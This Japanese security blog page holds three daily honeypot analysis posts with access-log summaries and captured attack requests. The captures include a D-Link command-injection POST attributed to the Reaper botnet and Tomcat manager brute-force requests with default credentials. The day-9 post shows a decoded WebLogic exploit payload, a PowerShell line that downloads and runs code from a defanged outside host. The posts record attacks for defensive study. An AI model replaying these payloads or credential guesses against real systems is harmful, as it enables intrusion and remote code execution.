2018-06-15

WOWHoneypot簡易分析(11日目)

honeypot

WOWhoneypotの2018/6/14(木)（運用11日目）の簡易分析です。

本日の総アクセス数は413件です。一気に倍近いのアクセスが来てビックリです。

$ awk '/06-14/{print $1,$5,$6}' /var/log/wowhoneypot/access_log | sort | uniq -c | sort -nr
163 [2018-06-14 "GET /
153 [2018-06-14 "POST /command.php
41 [2018-06-14 "GET /manager/html
10 [2018-06-14 "HEAD /
1 [2018-06-14 "PROPFIND /
1 [2018-06-14 "POST /wls-wsat/CoordinatorPortType
1 [2018-06-14 "HEAD hxxp://180.163.113[.]82/check_proxy
1 [2018-06-14 "GET /xampp/phpmyadmin/index.php
1 [2018-06-14 "GET /www/phpMyAdmin/index.php
1 [2018-06-14 "GET /web/phpMyAdmin/index.php
1 [2018-06-14 "GET /upload/bank-icons/bank-gh.jpg
1 [2018-06-14 "GET /upload/bank-icons/bank_16.png
1 [2018-06-14 "GET /typo3/phpmyadmin/index.php
1 [2018-06-14 "GET /tools/phpMyAdmin/index.php
1 [2018-06-14 "GET /stssys.htm
1 [2018-06-14 "GET /pmd/index.php
1 [2018-06-14 "GET /pma-old/index.php
1 [2018-06-14 "GET /pmamy2/index.php
1 [2018-06-14 "GET /PMA/index.php
1 [2018-06-14 "GET /pma/index.php
1 [2018-06-14 "GET /PMA2/index.php
1 [2018-06-14 "GET /phpMyAdminold/index.php
1 [2018-06-14 "GET /phpMyAdmin.old/index.php
1 [2018-06-14 "GET /phpmyadmin-old/index.php
1 [2018-06-14 "GET /phpMyAdmin/index.php
1 [2018-06-14 "GET /phpmyadmin/index.php
1 [2018-06-14 "GET /phpMyadmin_bak/index.php
1 [2018-06-14 "GET /phpmyadmin2/index.php
1 [2018-06-14 "GET /phpmyadmin1/index.php
1 [2018-06-14 "GET /phpadmin/index.php
1 [2018-06-14 "GET /mysqladmin/index.php
1 [2018-06-14 "GET /mysql-admin/index.php
1 [2018-06-14 "GET /myadmin2/index.php
1 [2018-06-14 "GET /index.php
1 [2018-06-14 "GET hxxp://httpheader.net/
1 [2018-06-14 "GET hxxp://clientapi.ipip[.]net/echo.php?info=20180614062859
1 [2018-06-14 "GET hxxp://114.215.207[.]183:83/index.php
1 [2018-06-14 "GET hxxp://112.124.127[.]162:83/index.php
1 [2018-06-14 "GET /.git/config
1 [2018-06-14 "GET /db/index.php
1 [2018-06-14 "GET /dbadmin/index.php
1 [2018-06-14 "GET /claroline/phpMyAdmin/index.php
1 [2018-06-14 "GET /cgi/common.cgi
1 [2018-06-14 "GET /admin/PMA/index.php
1 [2018-06-14 "GET /admin/pma/index.php
1 [2018-06-14 "GET /admin/phpMyAdmin/index.php
1 [2018-06-14 "GET /admin/phpmyadmin/index.php
1 [2018-06-14 "GET /admin/mysql/index.php
1 [2018-06-14 "GET /admin/mysql2/index.php
1 [2018-06-14 "GET /admin/index.php

いつものようにindex.phpを除きます。

$ awk '/06-14/{print $1,$5,$6}' /var/log/wowhoneypot/access_log | sort | uniq -c | sort -nr | grep -v index.php
163 [2018-06-14 "GET /
153 [2018-06-14 "POST /command.php
41 [2018-06-14 "GET /manager/html
10 [2018-06-14 "HEAD /
1 [2018-06-14 "PROPFIND /
1 [2018-06-14 "POST /wls-wsat/CoordinatorPortType
1 [2018-06-14 "HEAD hxxp://180.163.113[.]82/check_proxy
1 [2018-06-14 "GET /upload/bank-icons/bank-gh.jpg
1 [2018-06-14 "GET /upload/bank-icons/bank_16.png
1 [2018-06-14 "GET /stssys.htm
1 [2018-06-14 "GET hxxp://httpheader[.]net/
1 [2018-06-14 "GET hxxp://clientapi.ipip[.]net/echo.php?info=20180614062859
1 [2018-06-14 "GET /.git/config
1 [2018-06-14 "GET /cgi/common.cgi

本日大量に来ていたcommnad.phpのリクエストの中身は以下の通りでした。

POST /command.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Wget(linux)
Content-Length: 208

cmd=cd /var/tmp && echo -ne \\x00\\x00\\x00\\x00\\x00 >> drop && echo OK

これは5日目に来ていたものと同一と思われます。
Reaper というIoTボットネット/マルウェアが対象としている D-Link DIR-600とDIR-300 への攻撃かと思われます。

Reaperボットネットに関する簡単なまとめ - 忙しい人のためのサイバーセキュリティニュース

また、昨日と同様以下のアクセスがありました。Tomcatの管理ページに対するブルートフォース攻撃と思われます。

GET /manager/html HTTP/1.1
Content-Type: text/html
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
Authorization: Basic dXNlcjpzM2NyZXQ=

新しいものとして、以下がありました。詳細は不明ですが、画像ファイルが存在するかの調査行為のように思えます。

GET /upload/bank-icons/bank-gh.jpg HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: hxxp://(ipaddr):80/upload/bank-icons/bank-gh.jpg
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Connection: Keep-Alive
Cache-Control: no-cache

GET /upload/bank-icons/bank_16.png HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: hxxxp://(ipaddr):80/upload/bank-icons/bank_16.png
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Connection: Keep-Alive
Cache-Control: no-cache

その他細かいものは後日調べようと思います…

ハンティングログには残っていませんでした。

以上です。

2018-06-14

WOWHoneypot簡易分析(10日目)

honeypot

WOWhoneypotの2018/6/13(水)（運用10日目）の簡易分析です。

本日の総アクセス数は291件です。

$ awk '/06-13/{print $1,$5,$6}' /var/log/wowhoneypot/access_log | sort | uniq -c | sort -nr
148 [2018-06-13 "GET /
74 [2018-06-13 "GET /manager/html
2 [2018-06-13 "HEAD /
2 [2018-06-13 "GET /xampp/phpmyadmin/index.php
2 [2018-06-13 "GET /www/phpMyAdmin/index.php
2 [2018-06-13 "GET /web/phpMyAdmin/index.php
2 [2018-06-13 "GET /typo3/phpmyadmin/index.php
2 [2018-06-13 "GET /pmd/index.php
2 [2018-06-13 "GET /pma-old/index.php
2 [2018-06-13 "GET /pmamy2/index.php
2 [2018-06-13 "GET /pma/index.php
2 [2018-06-13 "GET /PMA2/index.php
2 [2018-06-13 "GET /phpMyAdmin/phpMyAdmin/index.php
2 [2018-06-13 "GET /phpMyAdminold/index.php
2 [2018-06-13 "GET /phpmyadmin-old/index.php
2 [2018-06-13 "GET /phpMyAdmin/index.php
2 [2018-06-13 "GET /phpMyadmin_bak/index.php
2 [2018-06-13 "GET /phpmyadmin1/index.php
2 [2018-06-13 "GET /phpmyadmin0/index.php
2 [2018-06-13 "GET /phpma/index.php
2 [2018-06-13 "GET /phpadmin/index.php
2 [2018-06-13 "GET /mysql-admin/index.php
2 [2018-06-13 "GET /myadmin/index.php
2 [2018-06-13 "GET /myadmin2/index.php
2 [2018-06-13 "GET /index.php
2 [2018-06-13 "GET /claroline/phpMyAdmin/index.php
2 [2018-06-13 "GET /admin/PMA/index.php
2 [2018-06-13 "GET /admin/pma/index.php
2 [2018-06-13 "GET /admin/phpMyAdmin/index.php
2 [2018-06-13 "GET /admin/phpmyadmin2/index.php
2 [2018-06-13 "GET /admin/mysql/index.php
2 [2018-06-13 "GET /admin/mysql2/index.php
1 [2018-06-13 "PROPFIND /
1 [2018-06-13 "POST /wls-wsat/CoordinatorPortType
1 [2018-06-13 "GET /pma/scripts/setup.php
1 [2018-06-13 "GET /phpMyAdmin/scripts/setup.php
1 [2018-06-13 "GET /phpmyadmin/phpmyadmin/index.php
1 [2018-06-13 "GET /myadmin/scripts/setup.php
1 [2018-06-13 "GET /db/index.php
1 [2018-06-13 "GET /dbadmin/index.php
1 [2018-06-13 "GET /admin/index.php

phpMyAdmin関係と思われるものを除きます。

awk '/06-13/{print $1,$5,$6}' /var/log/wowhoneypot/access_log | sort | uniq -c | sort -nr | grep -v index.php
148 [2018-06-13 "GET /
74 [2018-06-13 "GET /manager/html
2 [2018-06-13 "HEAD /
1 [2018-06-13 "PROPFIND /
1 [2018-06-13 "POST /wls-wsat/CoordinatorPortType
1 [2018-06-13 "GET /pma/scripts/setup.php
1 [2018-06-13 "GET /phpMyAdmin/scripts/setup.php
1 [2018-06-13 "GET /myadmin/scripts/setup.php

phpMyAdmin関係はこれまでindex.phpでしたが、本日はsetup.phpへのアクセスも3件ありました。

/wls-wsat/はWeblogicの脆弱性をついた攻撃と思いますが、前日と同様の内容でした。

それ以外で多かったのは、以下です。

74 [2018-06-13 "GET /manager/html

これまでもありましたが、Tomcatの管理ツールがあるかの調査行為と思われます。

パケットの内容を見ると、例えば以下です。

GET /manager/html HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Authorization: Basic bWFuYWdlcjp0b21jYXQyMDE3　※manager:tomcat2017
GET /manager/html HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Authorization: Basic bWFuYWdlcjp0b21jYXQyMDE4　※manager:tomcat2018

どうやら管理ページが存在するはずのページにbasic認証でブルートフォースを仕掛けているようです。そのため、アクセス数も多くなっているようです

ハンティングログはありませんでした。

以上です。

2018-06-13

WOWHoneypot簡易分析(9日目)

honeypot

WOWhoneypotの2018/6/12(火)（運用9日目）の簡易分析です。

本日の総アクセス数は186件です。

$ awk '/06-12/{print $1,$5,$6}' access_log | sort | uniq -c | sort -nr
108 [2018-06-12 "GET /
4 [2018-06-12 "GET /pma/index.php
4 [2018-06-12 "GET /phpmyadmin/index.php
4 [2018-06-12 "GET /mysql/index.php
4 [2018-06-12 "GET /index.php
4 [2018-06-12 "GET /db/index.php
3 [2018-06-12 "HEAD /
3 [2018-06-12 "GET /pmamy2/index.php
2 [2018-06-12 "POST /wls-wsat/CoordinatorPortType
2 [2018-06-12 "GET /pmd/index.php
2 [2018-06-12 "GET /phpmyadmin/phpmyadmin/index.php
2 [2018-06-12 "GET /phpMyAdmin.old/index.php
2 [2018-06-12 "GET /phpmyadmin-old/index.php
2 [2018-06-12 "GET /phpMyAdmin/index.php
2 [2018-06-12 "GET /phpMyadmin_bak/index.php
2 [2018-06-12 "GET /phpmyadmin2/index.php
2 [2018-06-12 "GET /phpmyadmin1/index.php
2 [2018-06-12 "GET /phpma/index.php
2 [2018-06-12 "GET /phpadmin/index.php
2 [2018-06-12 "GET /mysql-admin/index.php
2 [2018-06-12 "GET /myadmin/index.php
2 [2018-06-12 "GET /myadmin2/index.php
2 [2018-06-12 "GET /dbadmin/index.php
2 [2018-06-12 "GET /claroline/phpMyAdmin/index.php
2 [2018-06-12 "GET /admin/PMA/index.php
2 [2018-06-12 "GET /admin/phpmyadmin/index.php
2 [2018-06-12 "GET /admin/mysql/index.php
2 [2018-06-12 "GET /admin/index.php
1 [2018-06-12 "PROPFIND /
1 [2018-06-12 "GET /web/phpMyAdmin/index.php
1 [2018-06-12 "GET /pma-old/index.php
1 [2018-06-12 "GET /PMA/index.php
1 [2018-06-12 "GET /PMA2/index.php
1 [2018-06-12 "GET /phpMyAdmin/phpMyAdmin/index.php
1 [2018-06-12 "GET /phpMyAdminold/index.php
1 [2018-06-12 "GET /phpmyadmin0/index.php
1 [2018-06-12 "GET hxxp://httpheader[.]net/
1 [2018-06-12 "GET hxxp://db.speedup[.]gdn/echo.php
1 [2018-06-12 "GET /favicon.ico
1 [2018-06-12 "GET /admin/mysql2/index.php

ハンティングログは0件でした。

アクセスログからPhpMyAdmin関連と思われるindex.phpへのアクセスを除きます。

$ awk '/06-12/{print $1,$5,$6}' access_log | sort | uniq -c | sort -nr | grep -v index.php
108 [2018-06-12 "GET /
3 [2018-06-12 "HEAD /
2 [2018-06-12 "POST /wls-wsat/CoordinatorPortType
1 [2018-06-12 "PROPFIND /
1 [2018-06-12 "GET hxxp://httpheader[.]net/
1 [2018-06-12 "GET hxxp://db.speedup[.]gdn/echo.php
1 [2018-06-12 "GET /favicon.ico

毎日のWeblogicの脆弱性をつく任意のコード実行の攻撃部分です。いつもとパターンは同じです。

$ awk '/06-12/{print $1,$5,$6,$10}' access_log | grep wls | awk '{print $4}' | base64 -d | grep -o 'Hidden.*' | awk '{print $3}' | base64 -d
$OS=(GWmi Win32_OperatingSystem).Caption;$WC=New-Object Net.WebClient;$WC.Headers['User-Agent']="PowerShell/WL $OS";IEX $WC.DownloadString('hxxp://101.200.45[.]78/images/test/DL.php');base64: invalid input

以下は6/9も来ていたものです。UAから公開プロキシを探すスキャン行為と思われます。

GET hxxp://db.speedup[.]gdn/echo.php HTTP/1.1
User-Agent: PxBroker/0.3.1/5351
Accept: */*
Accept-Encoding: gzip, deflate
Pragma: no-cache
Cache-control: no-cache
Cookie: cookie=ok
Referer: https://www.google.com/
Host: db.speedup.gdn
Connection: close
Content-Length: 0

以下はどんな攻撃によるものか詳細不明です。

GET hxxp://httpheader[.]net/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729)
Host: httpheader.net
Accept-Encoding: deflate, gzip
Proxy-Connection: Keep-Alive
Accept-Language: en-gb,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Pragma: no-cache
Cache-Control: no-cache

以上です。

S-Owl

S(ecurity)Owl

WOWHoneypot簡易分析(11日目)

WOWHoneypot簡易分析(10日目)

WOWHoneypot簡易分析(9日目)